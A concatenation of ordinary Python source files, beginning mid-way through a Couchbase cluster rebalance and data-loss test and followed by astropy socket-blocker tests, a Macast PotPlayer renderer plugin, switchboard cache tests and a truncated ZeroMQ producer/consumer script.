new_server_list = list(set(new_server_list + servers_in) - set(servers_out))
self.log.info("==========Rebalance in 4 nodes =========")
# Rebalance in 4 nodes
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
new_server_list = list(set(new_server_list + servers_in))
self.log.info("==========Rebalance out 4 nodes =========")
# Rebalance out 4 nodes
servers_out = list(set(new_server_list) - set([self.master]))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, [], servers_out)
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
new_server_list = list(set(new_server_list) - set(servers_out))
self.log.info(
"======Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups=========")
# Rebalance in 4 nodes (8 nodes) wait for rebalance to finish and move between server groups
servers_in = list(set(self.servers) - set(new_server_list))[0:4]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1), batch=self.batch_size,
instances=self.instances)
self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
# Update initial doc and create more doc
load_thread = []
create_thread = []
for b in bucket:
load_thread.append(Thread(target=self.update_buckets_with_high_ops, args=(
self.master, b, self.initial_load, self.initial_load, self.batch_size, self.threads, 0,
self.instances, updated)))
create_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, b, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
for th in create_thread:
th.start()
total_doc += self.num_items
start_at = total_doc
updated += 1
self.log.info("======Graceful failover 1 KV node and add back(Delta and Full)=========")
# Graceful failover 1 KV node and add back(Delta and Full)
kv_server = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=False)
fail_over_task = self.cluster.async_failover([self.master], failover_nodes=[kv_server], graceful=True)
fail_over_task.result()
self.sleep(120)
# do a recovery and rebalance
rest.set_recovery_type('ns_1@' + kv_server.ip, recoveryType=self.recoveryType)
rest.add_back_node('ns_1@' + kv_server.ip)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
self.sleep(10)
for t in load_thread:
t.join()
for th in create_thread:
th.join()
total_doc, start_at, updated = self.create_update_till_rebalance_progress(rest, bucket, total_doc, start_at,
updated)
rebalance.result()
for b in bucket:
errors1=self.check_dataloss_for_high_ops_loader(self.master, b, self.initial_load, start_document=0, updated=True,
ops=self.initial_load * (updated - 1), batch=self.batch_size,
instances=self.instances)
errors2=self.check_dataloss_for_high_ops_loader(self.master, b, total_doc - self.initial_load,
start_document=self.initial_load, batch=self.batch_size,
instances=self.instances)
if len(errors1) > 0 or len(errors2) > 0:
self.fail("data is missing");
def load_till_rebalance_progress(self,rest,bucket,total_doc,start_at):
rebalance_status = rest._rebalance_progress_status()
self.log.info("###### Rebalance Status:{} ######".format(rebalance_status))
self.sleep(10)
while rebalance_status == 'running':
self.log.info("===== Loading {} as rebalance is going on =====".format(self.reload_size))
load_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(self.master,b, self.reload_size,
self.batch_size, self.threads, start_at,self.instances)))
for t in load_thread:
t.start()
for t in load_thread:
t.join()
rebalance_status = rest._rebalance_progress_status()
self.log.info("###### Rebalance Status:{} ######".format(rebalance_status))
total_doc += self.reload_size
start_at = total_doc
return total_doc,start_at
def create_update_till_rebalance_progress(self,rest,bucket,total_doc,start_at,updated):
rebalance_status = rest._rebalance_progress_status()
self.log.info("###### Rebalance Status:{} ######".format(rebalance_status))
self.sleep(10)
while rebalance_status == 'running':
self.log.info("===== Loading {} as rebalance is going on =====".format(self.reload_size))
load_thread = []
update_thread = []
for b in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(self.master,b, self.reload_size,
self.batch_size, self.threads,
start_at,self.threads)))
update_thread.append(Thread(target=self.update_buckets_with_high_ops,
args=(self.master,b, self.initial_load,self.initial_load,
self.batch_size, self.threads, 0,self.instances,updated)))
for t in load_thread:
t.start()
for th in update_thread:
th.start()
for t in load_thread:
t.join()
for th in update_thread:
th.join()
rebalance_status = rest._rebalance_progress_status()
self.log.info("###### Rebalance Status:{} ######".format(rebalance_status))
total_doc += self.reload_size
start_at = total_doc
updated += 1
return total_doc,start_at,updated
def shuffle_nodes_between_zones_and_rebalance(self, to_remove=None):
"""
Shuffle the nodes present in the cluster if zone > 1. Rebalance the nodes in the end.
Nodes are divided into groups iteratively i.e. 1st node in Group 1, 2nd in Group 2, 3rd in Group 1 and so on, when
zone=2.
:param to_remove: List of nodes to be removed.
"""
if not to_remove:
to_remove = []
serverinfo = self.servers[0]
rest = RestConnection(serverinfo)
zones = ["Group 1"]
nodes_in_zone = {"Group 1": [serverinfo.ip]}
# Create zones, if not existing, based on params zone in test.
# Shuffle the nodes between zones.
if int(self.zone) > 1:
for i in range(1, int(self.zone)):
a = "Group "
zones.append(a + str(i + 1))
if not rest.is_zone_exist(zones[i]):
rest.add_zone(zones[i])
nodes_in_zone[zones[i]] = []
# Divide the nodes between zones.
nodes_in_cluster = [node.ip for node in self.get_nodes_in_cluster()]
nodes_to_remove = [node.ip for node in to_remove]
for i in range(1, len(self.servers)):
if self.servers[i].ip in nodes_in_cluster and self.servers[i].ip not in nodes_to_remove:
server_group = i % int(self.zone)
nodes_in_zone[zones[server_group]].append(self.servers[i].ip)
# Shuffle the nodesS
for i in range(1, self.zone):
node_in_zone = list(set(nodes_in_zone[zones[i]]) -
set([node for node in rest.get_nodes_in_zone(zones[i])]))
rest.shuffle_nodes_in_zones(node_in_zone, zones[0], zones[i])
otpnodes = [node.id for node in rest.node_statuses()]
nodes_to_remove = [node.id for node in rest.node_statuses() if node.ip in [t.ip for t in to_remove]]
# Start rebalance and monitor it.
started = rest.rebalance(otpNodes=otpnodes, ejectedNodes=nodes_to_remove)
if started:
result = rest.monitorRebalance()
msg = "successfully rebalanced cluster {0}"
self.log.info(msg.format(result))
# Verify replicas of one node should not be in the same zone as active vbuckets of the node.
if self.zone > 1:
self._verify_replica_distribution_in_zones(nodes_in_zone)
def update_buckets_with_high_ops(self, server, bucket, items, ops,
batch=20000, threads=5, start_document=0,
instances=1,update_counter=1):
import subprocess
#cmd_format = "python scripts/high_ops_doc_loader.py --node {0} --bucket {1} --user {2} --password {3} " \
# "--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --instances {" \
# "9} --ops {10} --updates --update_counter {11}"
cmd_format = "python scripts/thanosied.py --spec couchbase://{0} --bucket {1} --user {2} --password {3} " \
"--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --workers {9} --rate_limit {10} " \
"--passes 1 --update_counter {11}"
cb_version = RestConnection(server).get_nodes_version()[:3]
if self.num_replicas > 1:
cmd_format = "{} --replicate_to 1".format(cmd_format)
cmd = cmd_format.format(server.ip, bucket.name, server.rest_username,
server.rest_password,
items, batch, threads, start_document,
cb_version, instances, int(ops),update_counter)
self.log.info("Running {}".format(cmd))
result = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output = result.stdout.read()
error = result.stderr.read()
if error:
self.log.error(error)
self.fail("Failed to run the loadgen.")
if output:
loaded = output.split('\n')[:-1]
total_loaded = 0
for load in loaded:
total_loaded += int(load.split(':')[1].strip())
self.assertEqual(total_loaded, ops,
"Failed to update {} items. Loaded only {} items".format(
ops,
total_loaded))
def load_buckets_with_high_ops(self, server, bucket, items, batch=20000, threads=10, start_document=0, instances=1
,ttl=0):
import subprocess
#cmd_format = "python scripts/high_ops_doc_loader.py --node {0} --bucket {1} --user {2} --password {3} " \
# "--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --instances {9} --ttl {10}"
cmd_format = "python scripts/thanosied.py --spec couchbase://{0} --bucket {1} --user {2} --password {3} " \
"--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --workers {9} --ttl {10}" \
"--passes 1"
cb_version = RestConnection(server).get_nodes_version()[:3]
if self.num_replicas > 0 and self.use_replica_to:
cmd_format = "{} --replicate_to 1".format(cmd_format)
cmd = cmd_format.format(server.ip, bucket.name, server.rest_username, server.rest_password, items, batch,
threads, start_document, cb_version, instances, ttl)
self.log.info("Running {}".format(cmd))
result = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = result.stdout.read()
error = result.stderr.read()
if error:
self.log.error(error)
self.fail("Failed to run the loadgen.")
if output:
loaded = output.split('\n')[:-1]
total_loaded = 0
for load in loaded:
total_loaded += int(load.split(':')[1].strip())
self.assertEqual(total_loaded, items,
"Failed to load {} items. Loaded only {} items".format(items, total_loaded))
def load_docs(self, bucket,num_items=0, start_document=0):
if self.loader == "pillowfight":
load_thread = Thread(target=self.load,
name="pillowfight_load",
args=(self.master, self.num_items, self.batch_size, self.doc_size, self.rate_limit))
return load_thread
elif self.loader == "high_ops":
if num_items == 0:
num_items = self.num_items
load_thread = Thread(target=self.load_buckets_with_high_ops,
name="high_ops_load",
args=(self.master, bucket, num_items, self.batch_size,
self.threads, start_document, self.instances))
return load_thread
def check_data(self, server, bucket, num_items=0):
if self.loader == "pillowfight":
return self.check_dataloss(server, bucket,num_items)
elif self.loader == "high_ops":
return self.check_dataloss_for_high_ops_loader(server, bucket, num_items)
def check_dataloss_for_high_ops_loader(self, server, bucket, items,
batch=2000, threads=5,
start_document=0,
updated=False, ops=0,instances=1):
import subprocess
from lib.memcached.helper.data_helper import VBucketAwareMemcached
#cmd_format = "python scripts/high_ops_doc_loader.py --node {0} --bucket {1} --user {2} --password {3} " \
# "--count {4} " \
# "--batch_size {5} --instances {9} --threads {6} --start_document {7} --cb_version {8} --validate"
cmd_format = "python scripts/thanosied.py --spec couchbase://{0} --bucket {1} --user {2} --password {3} " \
"--count {4} --batch_size {5} --threads {6} --start_document {7} --cb_version {8} --workers {9} --validation 1 " \
"--passes 1"
cb_version = RestConnection(server).get_nodes_version()[:3]
if updated:
cmd_format = "{} --updated --ops {}".format(cmd_format, int(ops))
cmd = cmd_format.format(server.ip, bucket.name, server.rest_username,
server.rest_password,
int(items), batch, threads, start_document, cb_version,instances)
self.log.info("Running {}".format(cmd))
result = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output = result.stdout.read()
error = result.stderr.read()
errors = []
rest = RestConnection(self.master)
VBucketAware = VBucketAwareMemcached(rest, bucket.name)
_, _, _ = VBucketAware.request_map(rest, bucket.name)
if error:
self.log.error(error)
self.fail("Failed to run the loadgen validator.")
if output:
loaded = output.split('\n')[:-1]
for load in loaded:
if "Missing keys:" in load:
keys = load.split(":")[1].strip().replace('[', '').replace(']', '')
keys = keys.split(',')
for key in keys:
key = key.strip()
key = key.replace('\'', '').replace('\\', '')
vBucketId = VBucketAware._get_vBucket_id(key)
errors.append(
("Missing key: {0}, VBucketId: {1}".format(key, vBucketId)))
if "Mismatch keys: " in load:
keys = load.split(":")[1].strip().replace('[', '').replace(']', '')
keys = keys.split(',')
for key in keys:
key = key.strip()
key = key.replace('\'', '').replace('\\', '')
vBucketId = VBucketAware._get_vBucket_id(key)
errors.append((
"Wrong value for key: {0}, VBucketId: {1}".format(
key, vBucketId)))
self.log.info("Total number of missing doc:{}".format(len(errors)))
self.log.info("Missing/Mismatch keys:{}".format(errors))
return errors
def test_volume_with_high_ops_reproduce(self):
rest = RestConnection(self.master)
bucket = rest.get_buckets()
start_at = 0
# load initial documents
self.create_ddocs_and_views()
load_thread = []
for bk in bucket:
load_thread.append(Thread(target=self.load_buckets_with_high_ops, args=(
self.master, bk, self.num_items, self.batch_size, self.threads, start_at, self.instances)))
for t in load_thread:
t.start()
stats_dst = rest.get_bucket_stats()
while stats_dst["curr_items"] < 1200000:
self.sleep(300)
stats_dst = rest.get_bucket_stats()
# Rebalance in 1 node
servers_init = self.servers[:self.nodes_init]
# Rebalance in 1 node
self.log.info("==========rebalance in 1 node=========")
servers_in = self.servers[self.nodes_init:self.nodes_init + 1]
rebalance = self.cluster.async_rebalance(servers_init, servers_in, [])
rebalance.result()
for t in load_thread:
t.join()
for b in bucket:
errors=self.check_dataloss_for_high_ops_loader(self.master, b, self.num_items,instances=self.instances)
if len(errors) > 0:
self.fail("data is missing");
|
test_socketblocker.py
|
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import sys
import time
from threading import Thread
import pytest
from ..disable_internet import no_internet
from ...extern.six.moves import BaseHTTPServer, SimpleHTTPServer
from ...extern.six.moves.urllib.request import urlopen
def test_outgoing_fails():
with pytest.raises(IOError):
with no_internet():
urlopen('http://www.astropy.org')
class StoppableHTTPServer(BaseHTTPServer.HTTPServer, object):
def __init__(self, *args):
super(StoppableHTTPServer, self).__init__(*args)
self.stop = False
def handle_request(self):
self.stop = True
super(StoppableHTTPServer, self).handle_request()
def serve_forever(self):
"""
Serve until stop set, which will happen if any request is handled
"""
while not self.stop:
self.handle_request()
@pytest.mark.parametrize(('localhost'), ('localhost', '127.0.0.1'))
def test_localconnect_succeeds(localhost):
"""
Ensure that connections to localhost are allowed, since these are genuinely
not remotedata.
"""
# port "0" means find open port
# see http://stackoverflow.com/questions/1365265/on-localhost-how-to-pick-a-free-port-number
httpd = StoppableHTTPServer(('localhost', 0),
SimpleHTTPServer.SimpleHTTPRequestHandler)
port = httpd.socket.getsockname()[1]
server = Thread(target=httpd.serve_forever)
server.setDaemon(True)
server.start()
time.sleep(0.1)
urlopen('http://{localhost:s}:{port:d}'.format(localhost=localhost, port=port)).close()
PY3_4 = sys.version_info[:2] >= (3, 4)
# Used for the below test--inline functions aren't pickleable
# by multiprocessing?
def _square(x):
return x ** 2
@pytest.mark.skipif('not PY3_4 or sys.platform == "win32" or sys.platform.startswith("gnu0")')
def test_multiprocessing_forkserver():
"""
Test that using multiprocessing with forkserver works. Perhaps
a simpler more direct test would be to just open some local
sockets and pass something through them.
Regression test for https://github.com/astropy/astropy/pull/3713
"""
import multiprocessing
ctx = multiprocessing.get_context('forkserver')
pool = ctx.Pool(1)
result = pool.map(_square, [1, 2, 3, 4, 5])
pool.close()
pool.join()
assert result == [1, 4, 9, 16, 25]
|
potplayer.py
|
# Copyright (c) 2021 by xfangfang. All Rights Reserved.
#
# Using potplayer as DLNA media renderer
#
# Macast Metadata
# <macast.title>PotPlayer Renderer</macast.title>
# <macast.renderer>PotplayerRenderer</macast.title>
# <macast.platform>win32</macast.title>
# <macast.version>0.4</macast.version>
# <macast.host_version>0.7</macast.host_version>
# <macast.author>xfangfang</macast.author>
# <macast.desc>PotPlayer support for Macast, this is a simple plugin that only supports play and stop.</macast.desc>
import os
import time
import cherrypy
import threading
import subprocess
from macast import cli, gui
from macast.renderer import Renderer
POTPLAYER_PATH = r'"C:\Program Files\DAUM\PotPlayer\PotPlayermini64.exe"'
class PotplayerRenderer(Renderer):
def __init__(self):
super(PotplayerRenderer, self).__init__()
self.start_position = 0
self.position_thread_running = True
self.position_thread = threading.Thread(target=self.position_tick, daemon=True)
self.position_thread.start()
# a thread is started here to increase the playback position once per second
# to simulate that the media is playing.
def position_tick(self):
while self.position_thread_running:
time.sleep(1)
self.start_position += 1
sec = self.start_position
position = '%d:%02d:%02d' % (sec // 3600, (sec % 3600) // 60, sec % 60)
self.set_state_position(position)
def set_media_stop(self):
subprocess.Popen(['taskkill', '/f', '/im', 'PotPlayerMini64.exe']).communicate()
self.set_state_transport('STOPPED')
cherrypy.engine.publish('renderer_av_stop')
def start_player(self, url):
try:
subprocess.call('{} "{}"'.format(POTPLAYER_PATH, url))
except Exception as e:
print(e)
self.set_media_stop()
cherrypy.engine.publish('app_notify', "Error", str(e))
def set_media_url(self, url, start=0):
self.set_media_stop()
self.start_position = 0
threading.Thread(target=self.start_player, daemon=True, kwargs={'url': url}).start()
self.set_state_transport("PLAYING")
cherrypy.engine.publish('renderer_av_uri', url)
def stop(self):
super(PotplayerRenderer, self).stop()
self.set_media_stop()
print("PotPlayer stop")
def start(self):
super(PotplayerRenderer, self).start()
print("PotPlayer start")
if __name__ == '__main__':
gui(PotplayerRenderer())
# or using cli to disable taskbar menu
# cli(PotplayerRenderer())
|
test_base.py
|
"""
switchboard.tests.test_base
~~~~~~~~~~~~~~~
:copyright: (c) 2015 Kyle Adams.
:license: Apache License 2.0, see LICENSE for more details.
"""
import time
import threading
import pytest
import pytest as pytest
from unittest.mock import Mock, patch
from blinker import Signal
from ..base import MongoModelDict, CachedDict
from ..models import VersioningMongoModel
from ..signals import request_finished
class MockModel(VersioningMongoModel):
def __init__(self, *args, **kwargs):
self._attrs = []
for k, v in kwargs.items():
if not hasattr(self, k):
self._attrs.append(k)
setattr(self, k, v)
def to_bson(self):
data = {}
for a in self._attrs:
data[a] = getattr(self, a)
return data
def __eq__(self, other):
for a in self._attrs:
# don't really care if IDs match, at least not for the tests
if a == '_id':
continue
if not hasattr(other, a):
return False
if getattr(self, a) != getattr(other, a):
return False
return True
class TestMongoModelDict:
def teardown(self):
MockModel.c.drop()
def test_api(self):
base_count = MockModel.count()
mydict = MongoModelDict(MockModel, key='key', value='value')
mydict['foo'] = MockModel(key='foo', value='bar')
assert isinstance(mydict['foo'], MockModel)
assert mydict['foo']._id
assert mydict['foo'].value == 'bar'
assert MockModel.get(key='foo').value == 'bar'
assert MockModel.count() == base_count + 1
old_id = mydict['foo']._id
mydict['foo'] = MockModel(key='foo', value='bar2')
assert isinstance(mydict['foo'], MockModel)
assert mydict['foo']._id == old_id
assert mydict['foo'].value == 'bar2'
assert MockModel.get(key='foo').value == 'bar2'
assert MockModel.count() == base_count + 1
# test deletion
mydict['foo'].delete()
assert 'foo' not in mydict
def test_expirey(self):
base_count = MockModel.count()
mydict = MongoModelDict(MockModel, key='key', value='value')
assert mydict._cache == None
instance = MockModel(key='test_expirey', value='hello')
mydict['test_expirey'] = instance
assert len(mydict._cache) == base_count + 1
assert mydict['test_expirey'] == instance
request_finished.send(Mock())
assert mydict._last_updated == None
assert mydict['test_expirey'] == instance
assert len(mydict._cache) == base_count + 1
def test_no_auto_create(self):
# without auto_create
mydict = MongoModelDict(MockModel, key='key', value='value')
pytest.raises(KeyError, lambda x: x['hello'], mydict)
assert MockModel.count() == 0
def test_auto_create_no_value(self):
# with auto_create and no value
mydict = MongoModelDict(MockModel, key='key', value='value',
auto_create=True)
repr(mydict['hello'])
assert MockModel.count() == 1
assert not hasattr(MockModel.get(key='hello'), 'value'), ''
def test_auto_create(self):
# with auto_create and value
mydict = MongoModelDict(MockModel, key='key', value='value',
auto_create=True)
mydict['hello'] = MockModel(key='hello', value='foo')
assert MockModel.count() == 1
assert MockModel.get(key='hello').value == 'foo'
def test_save_behavior(self):
mydict = MongoModelDict(MockModel, key='key', value='value',
auto_create=True)
mydict['hello'] = 'foo'
for n in range(10):
mydict[str(n)] = 'foo'
assert len(mydict) == 11
assert MockModel.count() == 11
mydict = MongoModelDict(MockModel, key='key', value='value',
auto_create=True)
m = MockModel.get(key='hello')
m.value = 'bar'
m.save()
assert MockModel.count() == 11
assert len(mydict) == 11
assert mydict['hello'].value == 'bar'
mydict = MongoModelDict(MockModel, key='key', value='value',
auto_create=True)
m = MockModel.get(key='hello')
m.value = 'bar2'
m.save()
assert MockModel.count() == 11
assert len(mydict) == 11
assert mydict['hello'].value == 'bar2'
def test_signals_are_connected(self):
MongoModelDict(MockModel, key='key', value='value',
auto_create=True)
post_save = VersioningMongoModel.post_save
post_delete = VersioningMongoModel.post_delete
assert post_save.has_receivers_for(MockModel)
assert post_delete.has_receivers_for(MockModel)
assert request_finished.has_receivers_for(Signal.ANY)
class TestCacheIntegration:
def setup(self):
self.cache = Mock()
self.cache.get.return_value = {}
self.mydict = MongoModelDict(MockModel, key='key', value='value',
auto_create=True)
self.mydict.cache = self.cache
def teardown(self):
MockModel.c.drop()
def test_model_creation(self):
instance = MockModel(key='hello', value='foo')
self.mydict['hello'] = instance
assert self.cache.get.call_count == 0
assert self.cache.set.call_count == 2
self.cache.set.assert_any_call(self.mydict.cache_key,
dict(hello=instance))
last_updated_key = self.mydict.last_updated_cache_key
self.cache.set.assert_any_call(last_updated_key,
self.mydict._last_updated)
def test_model_change(self):
self.mydict['hello'] = MockModel(key='hello', value='foo')
self.cache.reset_mock()
instance = MockModel(key='hello', value='bar')
self.mydict['hello'] = instance
assert self.cache.get.call_count == 0
assert self.cache.set.call_count == 2
self.cache.set.assert_any_call(self.mydict.cache_key,
dict(hello=instance))
last_updated_key = self.mydict.last_updated_cache_key
self.cache.set.assert_any_call(last_updated_key,
self.mydict._last_updated)
def test_model_delete(self):
self.mydict['hello'] = MockModel(key='hello', value='foo')
self.cache.reset_mock()
del self.mydict['hello']
assert self.cache.get.call_count == 0
assert self.cache.set.call_count == 2
self.cache.set.assert_any_call(self.mydict.cache_key, {})
last_updated_key = self.mydict.last_updated_cache_key
self.cache.set.assert_any_call(last_updated_key,
self.mydict._last_updated)
def test_model_access(self):
self.mydict['hello'] = MockModel(key='hello', value='foo')
self.cache.reset_mock()
foo = self.mydict['hello']
foo = self.mydict['hello']
foo = self.mydict['hello']
foo = self.mydict['hello']
assert foo.value == 'foo'
assert self.cache.get.call_count == 0
assert self.cache.set.call_count == 0
def test_model_access_without_cache(self):
spec = dict(key='hello', value='foo')
self.mydict['hello'] = MockModel(**spec)
self.mydict._cache = None
self.mydict._last_updated = None
self.cache.reset_mock()
foo = self.mydict['hello']
assert foo.value == 'foo'
assert self.cache.get.call_count == 2
assert self.cache.set.call_count == 0
self.cache.get.assert_any_call(self.mydict.cache_key)
self.cache.reset_mock()
foo = self.mydict['hello']
foo = self.mydict['hello']
foo = self.mydict['hello']
assert self.cache.get.call_count == 0
assert self.cache.set.call_count == 0
def test_model_access_with_expired_local_cache(self):
spec = dict(key='hello', value='foo')
self.mydict['hello'] = MockModel(**spec)
self.mydict._last_updated = None
self.cache.reset_mock()
foo = self.mydict['hello']
assert foo.value == 'foo'
assert self.cache.get.call_count == 1
assert self.cache.set.call_count == 0
self.cache.get.assert_any_call(self.mydict.last_updated_cache_key)
self.cache.reset_mock()
foo = self.mydict['hello']
foo = self.mydict['hello']
assert self.cache.get.call_count == 0
assert self.cache.set.call_count == 0
class TestCachedDict:
def setup(self):
self.cache = Mock()
self.mydict = CachedDict(timeout=100)
self.mydict.cache =self.cache
@patch('switchboard.base.CachedDict._update_cache_data')
@patch('switchboard.base.CachedDict.is_local_expired',
Mock(return_value=True))
@patch('switchboard.base.CachedDict.has_global_changed',
Mock(return_value=True))
def test_error_causes_reset(self, _update_cache_data):
self.cache.get.return_value = 1
self.mydict._cache = {}
self.mydict._last_updated = time.time()
self.mydict._populate()
assert _update_cache_data.called
@patch('switchboard.base.CachedDict._update_cache_data')
@patch('switchboard.base.CachedDict.is_local_expired',
Mock(return_value=True))
@patch('switchboard.base.CachedDict.has_global_changed',
Mock(return_value=False))
def test_expired_does_update_data(self, _update_cache_data):
self.mydict._cache = {}
self.mydict._last_updated = time.time()
self.mydict._populate()
assert not _update_cache_data.called
@patch('switchboard.base.CachedDict._update_cache_data')
@patch('switchboard.base.CachedDict.is_local_expired',
Mock(return_value=False))
@patch('switchboard.base.CachedDict.has_global_changed',
Mock(return_value=True))
def test_reset_does_expire(self, _update_cache_data):
self.mydict._cache = {}
self.mydict._last_updated = time.time()
self.mydict._populate(reset=True)
_update_cache_data.assert_called_once_with()
@patch('switchboard.base.CachedDict._update_cache_data')
@patch('switchboard.base.CachedDict.is_local_expired',
Mock(return_value=False))
@patch('switchboard.base.CachedDict.has_global_changed',
Mock(return_value=True))
def test_does_not_expire_by_default(self, _update_cache_data):
self.mydict._cache = {}
self.mydict._last_updated = time.time()
self.mydict._populate()
assert not _update_cache_data.called
def test_is_expired_missing_last_updated(self):
self.mydict._last_updated = None
assert self.mydict.is_local_expired()
assert not self.cache.get.called
def test_is_expired_last_updated_beyond_timeout(self):
self.mydict._last_updated = time.time() - 101
assert self.mydict.is_local_expired()
def test_is_expired_within_bounds(self):
self.mydict._last_updated = time.time()
def test_is_not_expired_if_remote_cache_is_old(self):
# set it to an expired time
self.mydict._last_updated = time.time() - 101
self.cache.get.return_value = self.mydict._last_updated
result = self.mydict.has_global_changed()
last_updated = self.mydict.last_updated_cache_key
self.cache.get.assert_called_once_with(last_updated)
assert result == False
def test_is_expired_if_remote_cache_is_new(self):
# set it to an expired time
self.mydict._last_updated = time.time() - 101
self.cache.get.return_value = time.time()
result = self.mydict.has_global_changed()
last_updated = self.mydict.last_updated_cache_key
self.cache.get.assert_called_once_with(last_updated)
assert result == True
def test_is_expired_if_never_updated(self):
# _last_updated None
self.mydict._last_updated = None
self.cache.get.return_value = time.time()
result = self.mydict.has_global_changed()
assert result == True
@patch('switchboard.base.CachedDict._populate')
@patch('switchboard.base.CachedDict.get_default')
def test_returns_default_if_no_local_cache(self, get_default, populate):
get_default.return_value = 'bar'
value = self.mydict['foo']
assert get_default.called
assert value == 'bar'
class TestCacheConcurrency:
def setup(self):
self.mydict = CachedDict()
self.exc = None
@patch('switchboard.base.CachedDict.get_cache_data')
def test_cache_reset_race(self, get_cache_data):
'''
Test race conditions when populating a cache.
Setup a situation where the cache is cleared immediately after being
populated, to simulate the race condition of one thread resetting it
just after another has populated it.
'''
get_cache_data.return_value = dict(key='test')
t2 = threading.Thread(target=self.mydict.clear_cache)
def verify_dict_access():
self.mydict._populate()
# Fire up the second thread and wait for it to clear the cache.
t2.start()
t2.join()
# Verify that the first thread's cache is still populated.
# Note: we don't call self.mydict['key'] because we don't want to
# re-trigger cache population.
# Note: Any errors (assertion or otherwise) must be surfaced up to
# the parent thread in order for nose to see that something went
# wrong.
try:
assert self.mydict._cache, 'The cache was reset between threads'
assert self.mydict._cache['key'] == 'test'
except Exception as e:
self.exc = e
t1 = threading.Thread(target=verify_dict_access)
t1.start()
t1.join()
if self.exc:
raise self.exc
|
producerconsumer.py
|
'''
Created on 21 Aug 2015
@author: up45
'''
import os, logging
from threading import Thread
import binascii
import zmq
import numpy as np
#import zmq.PAIR, zmq.DEALER, zmq.ROUTER, zmq.ETERM
logging.basicConfig(level=logging.DEBUG)
PIPELINE = 2
def zpipe(ctx):
"""build inproc pipe for talking to threads
mimic pipe used in czmq zthread_fork.
Returns a pair of PAIRs connected via inproc
"""
a = ctx.socket(zmq.PAIR)
b = ctx.socket(zmq.PAIR)
a.linger = b.linger = 0
a.hwm = b.hwm = 1
iface = "inproc://%s" % binascii.hexlify(os.urandom(8))
a.bind(iface)
b.connect(iface)
return a,b
def producer(ctx):
'''The producer function generates numpy arrays
The arrays are sent out on a ROUTER socket as per request from the consumer.
The function returns (None) when all available arrays has been sent.
'''
log = logging.getLogger("producer")
router = ctx.socket(zmq.ROUTER)
socket_name = "tcp://*:6000"
log.info("Binding socket name: %s", socket_name)
router.bind(socket_name)
# We have two parts per message so HWM is PIPELINE * 2
router.hwm = PIPELINE * 2
log.info("Router HWM: %d", router.hwm)
num_arrays = 5
array_counter = 0
log.info("Number of arrays to send: %d", num_arrays)
while True:
# First frame in each message is the sender identity
# Second frame is "fetch" command
try:
log.debug("receiving...")
msg = router.recv_multipart()
except zmq.ZMQError as e:
if e.errno == zmq.ETERM:
log.warning("Shutting down. zmq.ETERM")
return # shutting down, quit
else:
raise
log.debug( "got msg" )
identity, command = msg
log.debug("identity: %s cmd: %s", identity, command)
assert command == b"fetch"
data = b"blah"
log.debug("Sending data: %s", data)
router.send_multipart([identity, data], copy=False)
array_counter +=1
if array_counter > num_arrays:
break
log.info("Shutting down.")
def consumer(ctx, pipe):
'''The consumer requests and receives numpy arrays and write them to file
